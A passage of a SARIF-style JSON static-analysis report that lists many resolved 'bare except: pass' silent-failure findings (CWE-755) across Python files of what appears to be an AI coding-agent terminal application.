"severity": "high", "confidence": 0.85, "triageState": "fixed", "verdict": "", "isResolved": true, "reason": "", "evidence": {"snippet": "except: pass", "aljefra_cwe": ["CWE-755"], "aljefra_owasp": null, "aljefra_pattern_slug": "bare-except-pass"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/tool_system/tools/web_fetch.py"}, "region": {"startLine": 291}}}]}, {"ruleId": "ERRH001", "level": "error", "message": {"text": "Bare except: pass \u2014 silent failure"}, "properties": {"repobilityId": 17594, "scanner": "repobility", "fingerprint": "49698506778d944dcc29f2ee69488d79", "category": "error_handling", "severity": "high", "confidence": 0.85, "triageState": "fixed", "verdict": "", "isResolved": true, "reason": "", "evidence": {"snippet": "except: pass", "aljefra_cwe": ["CWE-755"], "aljefra_owasp": null, "aljefra_pattern_slug": "bare-except-pass"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/tool_system/tools/team.py"}, "region": {"startLine": 67}}}]}, {"ruleId": "ERRH001", "level": "error", "message": {"text": "Bare except: pass \u2014 silent failure"}, "properties": {"repobilityId": 17593, "scanner": "repobility", "fingerprint": "843038a01ec94fa1a85656a3d0420418", "category": "error_handling", "severity": "high", "confidence": 0.85, "triageState": "fixed", "verdict": "", "isResolved": true, "reason": "", "evidence": {"snippet": "except: pass", "aljefra_cwe": ["CWE-755"], "aljefra_owasp": null, "aljefra_pattern_slug": "bare-except-pass"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/tool_system/agent_loop.py"}, "region": {"startLine": 171}}}]}, {"ruleId": "ERRH001", "level": "error", "message": {"text": "Bare except: pass \u2014 silent failure"}, "properties": {"repobilityId": 17592, "scanner": "repobility", "fingerprint": "823eb7c31b0dcf5b562dcdf40d75818c", "category": "error_handling", "severity": "high", "confidence": 0.85, "triageState": "fixed", "verdict": "", "isResolved": true, "reason": "", "evidence": {"snippet": "except: pass", "aljefra_cwe": ["CWE-755"], "aljefra_owasp": null, "aljefra_pattern_slug": "bare-except-pass"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/skills/frontmatter.py"}, "region": {"startLine": 95}}}]}, {"ruleId": "ERRH001", "level": "error", "message": {"text": "Bare except: pass \u2014 silent failure"}, "properties": {"repobilityId": 17591, "scanner": "repobility", "fingerprint": "c5f72b46670075ed2e3f768f509a607f", "category": "error_handling", "severity": "high", "confidence": 0.85, "triageState": "fixed", "verdict": "", "isResolved": true, "reason": "", "evidence": {"snippet": "except: pass", "aljefra_cwe": ["CWE-755"], "aljefra_owasp": null, "aljefra_pattern_slug": "bare-except-pass"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/entrypoints/tui.py"}, "region": {"startLine": 240}}}]}, {"ruleId": "ERRH001", "level": "error", "message": {"text": "Bare except: pass \u2014 silent failure"}, "properties": {"repobilityId": 17590, "scanner": "repobility", "fingerprint": "ad8f692513a5dd830994b0713303cdb7", "category": "error_handling", "severity": "high", "confidence": 0.85, "triageState": "fixed", "verdict": "", "isResolved": true, "reason": "", "evidence": {"snippet": "except: pass", "aljefra_cwe": ["CWE-755"], "aljefra_owasp": null, "aljefra_pattern_slug": "bare-except-pass"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/entrypoints/tui.py"}, "region": {"startLine": 176}}}]}, {"ruleId": "ERRH001", "level": "error", "message": {"text": "Bare except: pass \u2014 silent failure"}, "properties": {"repobilityId": 17589, "scanner": "repobility", "fingerprint": "689150d4525a104e24126298deb275c9", "category": "error_handling", "severity": "high", "confidence": 0.85, "triageState": "fixed", "verdict": "", "isResolved": true, "reason": "", "evidence": {"snippet": "except: pass", "aljefra_cwe": ["CWE-755"], "aljefra_owasp": null, "aljefra_pattern_slug": "bare-except-pass"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/entrypoints/headless.py"}, "region": {"startLine": 337}}}]}, {"ruleId": "ERRH001", "level": "error", "message": {"text": "Bare except: pass \u2014 silent failure"}, "properties": {"repobilityId": 17588, "scanner": "repobility", "fingerprint": "69be78942b9d71d039b8e00196fd9731", "category": "error_handling", "severity": "high", "confidence": 0.85, "triageState": "fixed", "verdict": "", "isResolved": true, "reason": "", "evidence": {"snippet": "except: pass", "aljefra_cwe": ["CWE-755"], "aljefra_owasp": null, "aljefra_pattern_slug": "bare-except-pass"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/context_system/builder.py"}, "region": {"startLine": 108}}}]}, {"ruleId": "ERRH001", "level": "error", "message": {"text": "Bare except: pass \u2014 silent failure"}, "properties": {"repobilityId": 17587, "scanner": "repobility", "fingerprint": "bb92404f70a388d7f5c8edc8f730fd40", "category": "error_handling", "severity": "high", "confidence": 0.85, "triageState": "fixed", "verdict": "", "isResolved": true, "reason": "", "evidence": {"snippet": "except: pass", "aljefra_cwe": ["CWE-755"], "aljefra_owasp": null, "aljefra_pattern_slug": "bare-except-pass"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/context_system/builder.py"}, "region": {"startLine": 96}}}]}, {"ruleId": "ERRH001", "level": "error", "message": {"text": "Bare except: pass \u2014 silent failure"}, "properties": {"repobilityId": 17586, "scanner": "repobility", "fingerprint": "75242db9cf0e8d0131b9cafb99a01eaa", "category": "error_handling", "severity": "high", "confidence": 0.85, "triageState": "fixed", "verdict": "", "isResolved": true, "reason": "", "evidence": {"snippet": "except: pass", "aljefra_cwe": ["CWE-755"], "aljefra_owasp": null, "aljefra_pattern_slug": "bare-except-pass"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/context_system/prompt_assembly.py"}, "region": {"startLine": 119}}}]}, {"ruleId": "ERRH001", "level": "error", "message": {"text": "Bare except: pass \u2014 silent failure"}, "properties": {"repobilityId": 17585, "scanner": "repobility", "fingerprint": "9c9fb169711babff78d9d55129969708", "category": "error_handling", "severity": "high", "confidence": 0.85, "triageState": "fixed", "verdict": "", "isResolved": true, "reason": "", "evidence": {"snippet": "except: pass", "aljefra_cwe": ["CWE-755"], "aljefra_owasp": null, "aljefra_pattern_slug": "bare-except-pass"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/context_system/prompt_assembly.py"}, "region": {"startLine": 86}}}]}, {"ruleId": "ERRH001", "level": "error", "message": {"text": "Bare except: pass \u2014 silent failure"}, "properties": {"repobilityId": 17584, "scanner": "repobility", "fingerprint": "9f418d847967dd98a1f2b4d863570ecd", "category": "error_handling", "severity": "high", "confidence": 0.85, "triageState": "fixed", "verdict": "", "isResolved": true, "reason": "", "evidence": {"snippet": "except: pass", "aljefra_cwe": ["CWE-755"], "aljefra_owasp": null, "aljefra_pattern_slug": "bare-except-pass"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/context_system/prompt_assembly.py"}, "region": {"startLine": 759}}}]}, {"ruleId": "ERRH001", "level": "error", "message": {"text": "Bare except: pass \u2014 silent failure"}, "properties": {"repobilityId": 17583, "scanner": "repobility", "fingerprint": "7c9f4bfb4c0067561071dde6e1c696fc", "category": "error_handling", "severity": "high", "confidence": 0.85, "triageState": "fixed", "verdict": "", "isResolved": true, "reason": "", "evidence": {"snippet": "except: pass", "aljefra_cwe": ["CWE-755"], "aljefra_owasp": null, "aljefra_pattern_slug": "bare-except-pass"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/tui/screens/theme_picker.py"}, "region": {"startLine": 91}}}]}, {"ruleId": "ERRH001", "level": "error", "message": {"text": "Bare except: pass \u2014 silent failure"}, "properties": {"repobilityId": 17582, "scanner": "repobility", "fingerprint": "babe36688a3e8d592df1a882520aa691", "category": "error_handling", "severity": "high", "confidence": 0.85, "triageState": "fixed", "verdict": "", "isResolved": true, "reason": "", "evidence": {"snippet": "except: pass", "aljefra_cwe": ["CWE-755"], "aljefra_owasp": null, "aljefra_pattern_slug": "bare-except-pass"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/tui/screens/theme_picker.py"}, "region": {"startLine": 81}}}]}, {"ruleId": "ERRH001", "level": "error", "message": {"text": "Bare except: pass \u2014 silent failure"}, "properties": {"repobilityId": 17581, "scanner": "repobility", "fingerprint": "4093ff3e8184ee7a68a69cc4041b3f36", "category": "error_handling", "severity": "high", "confidence": 0.85, "triageState": "fixed", "verdict": "", "isResolved": true, "reason": "", "evidence": {"snippet": "except: pass", "aljefra_cwe": ["CWE-755"], "aljefra_owasp": null, "aljefra_pattern_slug": "bare-except-pass"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/tui/screens/theme_picker.py"}, "region": {"startLine": 73}}}]}, {"ruleId": "ERRH001", "level": "error", "message": {"text": "Bare except: pass \u2014 silent failure"}, "properties": {"repobilityId": 17580, "scanner": "repobility", "fingerprint": "6d65501503c4c846ce91264ddd62dfee", "category": "error_handling", "severity": "high", "confidence": 0.85, "triageState": "fixed", "verdict": "", "isResolved": true, "reason": "", "evidence": {"snippet": "except: pass", "aljefra_cwe": ["CWE-755"], "aljefra_owasp": null, "aljefra_pattern_slug": "bare-except-pass"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/tui/screens/permission_modal.py"}, "region": {"startLine": 132}}}]}, {"ruleId": "ERRH001", "level": "error", "message": {"text": "Bare except: pass \u2014 silent failure"}, "properties": {"repobilityId": 17579, "scanner": "repobility", "fingerprint": "fa01b6561a65906458f8dd6b112cd4db", "category": "error_handling", "severity": "high", "confidence": 0.85, "triageState": "fixed", "verdict": "", "isResolved": true, "reason": "", "evidence": {"snippet": "except: pass", "aljefra_cwe": ["CWE-755"], "aljefra_owasp": null, "aljefra_pattern_slug": "bare-except-pass"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/tui/screens/model_picker.py"}, "region": {"startLine": 69}}}]}, {"ruleId": "ERRH001", "level": "error", "message": {"text": "Bare except: pass \u2014 silent failure"}, "properties": {"repobilityId": 17578, "scanner": "repobility", "fingerprint": "83b577ed54b316ebb0e0f1137c2cbfa0", "category": "error_handling", "severity": "high", "confidence": 0.85, "triageState": "fixed", "verdict": "", "isResolved": true, "reason": "", "evidence": {"snippet": "except: pass", "aljefra_cwe": ["CWE-755"], "aljefra_owasp": null, "aljefra_pattern_slug": "bare-except-pass"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/tui/screens/exit_flow.py"}, "region": {"startLine": 92}}}]}, {"ruleId": "ERRH001", "level": "error", "message": {"text": "Bare except: pass \u2014 silent failure"}, "properties": {"repobilityId": 17577, "scanner": "repobility", "fingerprint": "9bf498d977a13e1c5f87bbcd198148fb", "category": "error_handling", "severity": "high", "confidence": 0.85, "triageState": "fixed", "verdict": "", "isResolved": true, "reason": "", "evidence": {"snippet": "except: pass", "aljefra_cwe": ["CWE-755"], "aljefra_owasp": null, "aljefra_pattern_slug": "bare-except-pass"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/tui/screens/exit_flow.py"}, "region": {"startLine": 82}}}]}, {"ruleId": "ERRH001", "level": "error", "message": {"text": "Bare except: pass \u2014 silent failure"}, "properties": {"repobilityId": 17576, "scanner": "repobility", "fingerprint": "dcc97782753acf918e95790021d73cb3", "category": "error_handling", "severity": "high", "confidence": 0.85, "triageState": "fixed", "verdict": "", "isResolved": true, "reason": "", "evidence": {"snippet": "except: pass", "aljefra_cwe": ["CWE-755"], "aljefra_owasp": null, "aljefra_pattern_slug": "bare-except-pass"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/tui/screens/effort_picker.py"}, "region": {"startLine": 84}}}]}, {"ruleId": "ERRH001", "level": "error", "message": {"text": "Bare except: pass \u2014 silent failure"}, "properties": {"repobilityId": 17575, "scanner": "repobility", "fingerprint": "c1e1c7f22fac2d4d191380fb9dd077c3", "category": "error_handling", "severity": "high", "confidence": 0.85, "triageState": "fixed", "verdict": "", "isResolved": true, "reason": "", "evidence": {"snippet": "except: pass", "aljefra_cwe": ["CWE-755"], "aljefra_owasp": null, "aljefra_pattern_slug": "bare-except-pass"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/tui/screens/history_search.py"}, "region": {"startLine": 144}}}]}, {"ruleId": "ERRH001", "level": "error", "message": {"text": "Bare except: pass \u2014 silent failure"}, "properties": {"repobilityId": 17574, "scanner": "repobility", "fingerprint": "d39d47aa1216aa40f7f70c0b6e4decb5", "category": "error_handling", "severity": "high", "confidence": 0.85, "triageState": "fixed", "verdict": "", "isResolved": true, "reason": "", "evidence": {"snippet": "except: pass", "aljefra_cwe": ["CWE-755"], "aljefra_owasp": null, "aljefra_pattern_slug": "bare-except-pass"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/tui/screens/mcp_dialogs.py"}, "region": {"startLine": 84}}}]}, {"ruleId": "ERRH001", "level": "error", "message": {"text": "Bare except: pass \u2014 silent failure"}, "properties": {"repobilityId": 17573, "scanner": "repobility", "fingerprint": "a6b0c6789d1ba5d0a255aa816de25c0d", "category": "error_handling", "severity": "high", "confidence": 0.85, "triageState": "fixed", "verdict": "", "isResolved": true, "reason": "", "evidence": {"snippet": "except: pass", "aljefra_cwe": ["CWE-755"], "aljefra_owasp": null, "aljefra_pattern_slug": "bare-except-pass"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/tui/screens/cost_threshold.py"}, "region": {"startLine": 56}}}]}, {"ruleId": "ERRH001", "level": "error", "message": {"text": "Bare except: pass \u2014 silent failure"}, "properties": {"repobilityId": 17572, "scanner": "repobility", "fingerprint": "c3ae39b5a91449ee15fba1191d15326b", "category": "error_handling", "severity": "high", "confidence": 0.85, "triageState": "fixed", "verdict": "", "isResolved": true, "reason": "", "evidence": {"snippet": "except: pass", "aljefra_cwe": ["CWE-755"], "aljefra_owasp": null, "aljefra_pattern_slug": "bare-except-pass"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/tui/screens/message_selector.py"}, "region": {"startLine": 118}}}]}, {"ruleId": "ERRH001", "level": "error", "message": {"text": "Bare except: pass \u2014 silent failure"}, "properties": {"repobilityId": 17571, "scanner": "repobility", "fingerprint": "f8108fde6389278d0a8a16a78e1d72c2", "category": "error_handling", "severity": "high", "confidence": 0.85, "triageState": "fixed", "verdict": "", "isResolved": true, "reason": "", "evidence": {"snippet": "except: pass", "aljefra_cwe": ["CWE-755"], "aljefra_owasp": null, "aljefra_pattern_slug": "bare-except-pass"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/tui/screens/idle_return.py"}, "region": {"startLine": 89}}}]}, {"ruleId": "ERRH001", "level": "error", "message": {"text": "Bare except: pass \u2014 silent failure"}, "properties": {"repobilityId": 17570, "scanner": "repobility", "fingerprint": "b99a9a46e608bc5ad9de6b644a6b14b6", "category": "error_handling", "severity": "high", "confidence": 0.85, "triageState": "fixed", "verdict": "", "isResolved": true, "reason": "", "evidence": {"snippet": "except: pass", "aljefra_cwe": ["CWE-755"], "aljefra_owasp": null, "aljefra_pattern_slug": "bare-except-pass"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/tui/screens/idle_return.py"}, "region": {"startLine": 79}}}]}, {"ruleId": "ERRH001", "level": "error", "message": {"text": "Bare except: pass \u2014 silent failure"}, "properties": {"repobilityId": 17569, "scanner": "repobility", "fingerprint": "7570d1b8c6dbcd097849e920d7dc21e7", "category": "error_handling", "severity": "high", "confidence": 0.85, "triageState": "fixed", "verdict": "", "isResolved": true, "reason": "", "evidence": {"snippet": "except: pass", "aljefra_cwe": ["CWE-755"], "aljefra_owasp": null, "aljefra_pattern_slug": "bare-except-pass"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/tui/widgets/messages/base.py"}, "region": {"startLine": 74}}}]}, {"ruleId": "ERRH001", "level": "error", "message": {"text": "Bare except: pass \u2014 silent failure"}, "properties": {"repobilityId": 17568, "scanner": "repobility", "fingerprint": "aa4da27a5e6c36a5ce1a2e3ab983ad54", "category": "error_handling", "severity": "high", "confidence": 0.85, "triageState": "fixed", "verdict": "", "isResolved": true, "reason": "", "evidence": {"snippet": "except: pass", "aljefra_cwe": ["CWE-755"], "aljefra_owasp": null, "aljefra_pattern_slug": "bare-except-pass"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/tui/widgets/tool_activity/base.py"}, "region": {"startLine": 85}}}]}, {"ruleId": "ERRH001", "level": "error", "message": {"text": "Bare except: pass \u2014 silent failure"}, "properties": {"repobilityId": 17567, "scanner": "repobility", "fingerprint": "1ca657dd644f31521eaf44cdca658deb", "category": "error_handling", "severity": "high", "confidence": 0.85, "triageState": "fixed", "verdict": "", "isResolved": true, "reason": "", "evidence": {"snippet": "except: pass", "aljefra_cwe": ["CWE-755"], "aljefra_owasp": null, "aljefra_pattern_slug": "bare-except-pass"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/tui/widgets/tool_activity/base.py"}, "region": {"startLine": 74}}}]}, {"ruleId": "ERRH001", "level": "error", "message": {"text": "Bare except: pass \u2014 silent failure"}, "properties": {"repobilityId": 17566, "scanner": "repobility", "fingerprint": "88d4fcd934f29b445c8cd2d2565f1124", "category": "error_handling", "severity": "high", "confidence": 0.85, "triageState": "fixed", "verdict": "", "isResolved": true, "reason": "", "evidence": {"snippet": "except: pass", "aljefra_cwe": ["CWE-755"], "aljefra_owasp": null, "aljefra_pattern_slug": "bare-except-pass"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/tui/widgets/transcript_view.py"}, "region": {"startLine": 288}}}]}, {"ruleId": "ERRH001", "level": "error", "message": {"text": "Bare except: pass \u2014 silent failure"}, "properties": {"repobilityId": 17565, "scanner": "repobility", "fingerprint": "944f312f60485c423608f7f88f39518e", "category": "error_handling", "severity": "high", "confidence": 0.85, "triageState": "fixed", "verdict": "", "isResolved": true, "reason": "", "evidence": {"snippet": "except: pass", "aljefra_cwe": ["CWE-755"], "aljefra_owasp": null, "aljefra_pattern_slug": "bare-except-pass"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/tui/widgets/transcript_view.py"}, "region": {"startLine": 259}}}]}, {"ruleId": "ERRH001", "level": "error", "message": {"text": "Bare except: pass \u2014 silent failure"}, "properties": {"repobilityId": 17564, "scanner": "repobility", "fingerprint": "dc3a191088d07a92b3b06d648d7d7db9", "category": "error_handling", "severity": "high", "confidence": 0.85, "triageState": "fixed", "verdict": "", "isResolved": true, "reason": "", "evidence": {"snippet": "except: pass", "aljefra_cwe": ["CWE-755"], "aljefra_owasp": null, "aljefra_pattern_slug": "bare-except-pass"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/tui/widgets/transcript_view.py"}, "region": {"startLine": 209}}}]}, {"ruleId": "ERRH001", "level": "error", "message": {"text": "Bare except: pass \u2014 silent failure"}, "properties": {"repobilityId": 17563, "scanner": "repobility", "fingerprint": "0fa8c913660dabbea316150c8cd6f71e", "category": "error_handling", "severity": "high", "confidence": 0.85, "triageState": "fixed", "verdict": "", "isResolved": true, "reason": "", "evidence": {"snippet": "except: pass", "aljefra_cwe": ["CWE-755"], "aljefra_owasp": null, "aljefra_pattern_slug": "bare-except-pass"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/tui/theme.py"}, "region": {"startLine": 187}}}]}, {"ruleId": "ERRH001", "level": "error", "message": {"text": "Bare except: pass \u2014 silent failure"}, "properties": {"repobilityId": 17562, "scanner": "repobility", "fingerprint": "fdc08b4fc54e5afa5e39111cdefc3d51", "category": "error_handling", "severity": "high", "confidence": 0.85, "triageState": "fixed", "verdict": "", "isResolved": true, "reason": "", "evidence": {"snippet": "except: pass", "aljefra_cwe": ["CWE-755"], "aljefra_owasp": null, "aljefra_pattern_slug": "bare-except-pass"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/tui/app.py"}, "region": {"startLine": 802}}}]}, {"ruleId": "ERRH001", "level": "error", "message": {"text": "Bare except: pass \u2014 silent failure"}, "properties": {"repobilityId": 17561, "scanner": "repobility", "fingerprint": "fb1172718d3b5e9bb22090ec38697371", "category": "error_handling", "severity": "high", "confidence": 0.85, "triageState": "fixed", "verdict": "", "isResolved": true, "reason": "", "evidence": {"snippet": "except: pass", "aljefra_cwe": ["CWE-755"], "aljefra_owasp": null, "aljefra_pattern_slug": "bare-except-pass"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/tui/app.py"}, "region": {"startLine": 775}}}]}, {"ruleId": "ERRH001", "level": "error", "message": {"text": "Bare except: pass \u2014 silent failure"}, "properties": {"repobilityId": 17560, "scanner": "repobility", "fingerprint": "2b00496bde391b2fd9f0a28b2b476301", "category": "error_handling", "severity": "high", "confidence": 0.85, "triageState": "fixed", "verdict": "", "isResolved": true, "reason": "", "evidence": {"snippet": "except: pass", "aljefra_cwe": ["CWE-755"], "aljefra_owasp": null, "aljefra_pattern_slug": "bare-except-pass"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/tui/app.py"}, "region": {"startLine": 763}}}]}, {"ruleId": "ERRH001", "level": "error", "message": {"text": "Bare except: pass \u2014 silent failure"}, "properties": {"repobilityId": 17559, "scanner": "repobility", "fingerprint": "0086fc44649e79f2982a6850234dba81", "category": "error_handling", "severity": "high", "confidence": 0.85, "triageState": "fixed", "verdict": "", "isResolved": true, "reason": "", "evidence": {"snippet": "except: pass", "aljefra_cwe": ["CWE-755"], "aljefra_owasp": null, "aljefra_pattern_slug": "bare-except-pass"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/tui/app.py"}, "region": {"startLine": 748}}}]}, {"ruleId": "ERRH001", "level": "error", "message": {"text": "Bare except: pass \u2014 silent failure"}, "properties": {"repobilityId": 17558, "scanner": "repobility", "fingerprint": "64e1c8559ad810a9d86f2c0872033c75", "category": "error_handling", "severity": "high", "confidence": 0.85, "triageState": "fixed", "verdict": "", "isResolved": true, "reason": "", "evidence": {"snippet": "except: pass", "aljefra_cwe": ["CWE-755"], "aljefra_owasp": null, "aljefra_pattern_slug": "bare-except-pass"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/tui/app.py"}, "region": {"startLine": 732}}}]}, {"ruleId": "ERRH001", "level": "error", "message": {"text": "Bare except: pass \u2014 silent failure"}, "properties": {"repobilityId": 17557, "scanner": "repobility", "fingerprint": "643148954fc638433bf817ea6e854cf6", "category": "error_handling", "severity": "high", "confidence": 0.85, "triageState": "fixed", "verdict": "", "isResolved": true, "reason": "", "evidence": {"snippet": "except: pass", "aljefra_cwe": ["CWE-755"], "aljefra_owasp": null, "aljefra_pattern_slug": "bare-except-pass"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/tui/app.py"}, "region": {"startLine": 294}}}]}, {"ruleId": "ERRH001", "level": "error", "message": {"text": "Bare except: pass \u2014 silent failure"}, "properties": {"repobilityId": 17556, "scanner": "repobility", "fingerprint": "e9628d31b67e0bd00f1b3cd73a47edc6", "category": "error_handling", "severity": "high", "confidence": 0.85, "triageState": "fixed", "verdict": "", "isResolved": true, "reason": "", "evidence": {"snippet": "except: pass", "aljefra_cwe": ["CWE-755"], "aljefra_owasp": null, "aljefra_pattern_slug": "bare-except-pass"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/tui/app.py"}, "region": {"startLine": 219}}}]}, {"ruleId": "ERRH001", "level": "error", "message": {"text": "Bare except: pass \u2014 silent failure"}, "properties": {"repobilityId": 17555, "scanner": "repobility", "fingerprint": "9e702dcc54fd37ad1f8d0cabf513a433", "category": "error_handling", "severity": "high", "confidence": 0.85, "triageState": "fixed", "verdict": "", "isResolved": true, "reason": "", "evidence": {"snippet": "except: pass", "aljefra_cwe": ["CWE-755"], "aljefra_owasp": null, "aljefra_pattern_slug": "bare-except-pass"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/tui/app.py"}, "region": {"startLine": 213}}}]}, {"ruleId": "ERRH001", "level": "error", "message": {"text": "Bare except: pass \u2014 silent failure"}, "properties": {"repobilityId": 17554, "scanner": "repobility", "fingerprint": "74d8697bcf97eea7f4079ec66a030deb", "category": "error_handling", "severity": "high", "confidence": 0.85, "triageState": "fixed", "verdict": "", "isResolved": true, "reason": "", "evidence": {"snippet": "except: pass", "aljefra_cwe": ["CWE-755"], "aljefra_owasp": null, "aljefra_pattern_slug": "bare-except-pass"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/tui/app.py"}, "region": {"startLine": 205}}}]}, {"ruleId": "ERRH001", "level": "error", "message": {"text": "Bare except: pass \u2014 silent failure"}, "properties": {"repobilityId": 17553, "scanner": "repobility", "fingerprint": "ca65ecc6cd33427729d7e02b6b6dd87b", "category": "error_handling", "severity": "high", "confidence": 0.85, "triageState": "fixed", "verdict": "", "isResolved": true, "reason": "", "evidence": {"snippet": "except: pass", "aljefra_cwe": ["CWE-755"], "aljefra_owasp": null, "aljefra_pattern_slug": "bare-except-pass"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/tui/app.py"}, "region": {"startLine": 184}}}]}, {"ruleId": "ERRH001", "level": "error", "message": {"text": "Bare except: pass \u2014 silent failure"}, "properties": {"repobilityId": 17552, "scanner": "repobility", "fingerprint": "54df8a9d528c9db2e4a7c8426c90f66a", "category": "error_handling", "severity": "high", "confidence": 0.85, "triageState": "fixed", "verdict": "", "isResolved": true, "reason": "", "evidence": {"snippet": "except: pass", "aljefra_cwe": ["CWE-755"], "aljefra_owasp": null, "aljefra_pattern_slug": "bare-except-pass"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/tui/terminal_chrome.py"}, "region": {"startLine": 115}}}]}, {"ruleId": "ERRH001", "level": "error", "message": {"text": "Bare except: pass \u2014 silent failure"}, "properties": {"repobilityId": 17551, "scanner": "repobility", "fingerprint": "58136dc78d2a4d84fdd52a7f1ec33ae7", "category": "error_handling", "severity": "high", "confidence": 0.85, "triageState": "fixed", "verdict": "", "isResolved": true, "reason": "", "evidence": {"snippet": "except: pass", "aljefra_cwe": ["CWE-755"], "aljefra_owasp": null, "aljefra_pattern_slug": "bare-except-pass"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/tui/a11y.py"}, "region": {"startLine": 177}}}]}, {"ruleId": "ERRH001", "level": "error", "message": {"text": "Bare except: pass \u2014 silent failure"}, "properties": {"repobilityId": 17550, "scanner": "repobility", "fingerprint": "42f7273787072a4c51d3e4ec043538cf", "category": "error_handling", "severity": "high", "confidence": 0.85, "triageState": "fixed", "verdict": "", "isResolved": true, "reason": "", "evidence": {"snippet": "except: pass", "aljefra_cwe": ["CWE-755"], "aljefra_owasp": null, "aljefra_pattern_slug": "bare-except-pass"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/tui/a11y.py"}, "region": {"startLine": 171}}}]}, {"ruleId": "ERRH001", "level": "error", "message": {"text": "Bare except: pass \u2014 silent failure"}, "properties": {"repobilityId": 17549, "scanner": "repobility", "fingerprint": "828c4160c0c3133ead2d7ef12b1a7d08", "category": "error_handling", "severity": "high", "confidence": 0.85, "triageState": "fixed", "verdict": "", "isResolved": true, "reason": "", "evidence": {"snippet": "except: pass", "aljefra_cwe": ["CWE-755"], "aljefra_owasp": null, "aljefra_pattern_slug": "bare-except-pass"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/tui/a11y.py"}, "region": {"startLine": 239}}}]}, {"ruleId": "ERRH001", "level": "error", "message": {"text": "Bare except: pass \u2014 silent failure"}, "properties": {"repobilityId": 17548, "scanner": "repobility", "fingerprint": "141a87de6570a0a2838a1cffe129566d", "category": "error_handling", "severity": "high", "confidence": 0.85, "triageState": "fixed", "verdict": "", "isResolved": true, "reason": "", "evidence": {"snippet": "except: pass", "aljefra_cwe": ["CWE-755"], "aljefra_owasp": null, "aljefra_pattern_slug": "bare-except-pass"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/tui/a11y.py"}, "region": {"startLine": 235}}}]}, {"ruleId": "ERRH001", "level": "error", "message": {"text": "Bare except: pass \u2014 silent failure"}, "properties": {"repobilityId": 17547, "scanner": "repobility", "fingerprint": "6d886b48a64c388526b77e42cf335280", "category": "error_handling", "severity": "high", "confidence": 0.85, "triageState": "fixed", "verdict": "", "isResolved": true, "reason": "", "evidence": {"snippet": "except: pass", "aljefra_cwe": ["CWE-755"], "aljefra_owasp": null, "aljefra_pattern_slug": "bare-except-pass"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/tui/agent_bridge.py"}, "region": {"startLine": 202}}}]}, {"ruleId": "ERRH001", "level": "error", "message": {"text": "Bare except: pass \u2014 silent failure"}, "properties": {"repobilityId": 17546, "scanner": "repobility", "fingerprint": "74e5d18a30162fa624e767106d2bb316", "category": "error_handling", "severity": "high", "confidence": 0.85, "triageState": "fixed", "verdict": "", "isResolved": true, "reason": "", "evidence": {"snippet": "except: pass", "aljefra_cwe": ["CWE-755"], "aljefra_owasp": null, "aljefra_pattern_slug": "bare-except-pass"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/tui/commands.py"}, "region": {"startLine": 117}}}]}, {"ruleId": "ERRH001", "level": "error", "message": {"text": "Bare except: pass \u2014 silent failure"}, "properties": {"repobilityId": 17545, "scanner": "repobility", "fingerprint": "bf2416d749f58f186f7b5282817bf474", "category": "error_handling", "severity": "high", "confidence": 0.85, "triageState": "fixed", "verdict": "", "isResolved": true, "reason": "", "evidence": {"snippet": "except: pass", "aljefra_cwe": ["CWE-755"], "aljefra_owasp": null, "aljefra_pattern_slug": "bare-except-pass"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/tui/commands.py"}, "region": {"startLine": 108}}}]}, {"ruleId": "ERRH001", "level": "error", "message": {"text": "Bare except: pass \u2014 silent failure"}, "properties": {"repobilityId": 17544, "scanner": "repobility", "fingerprint": 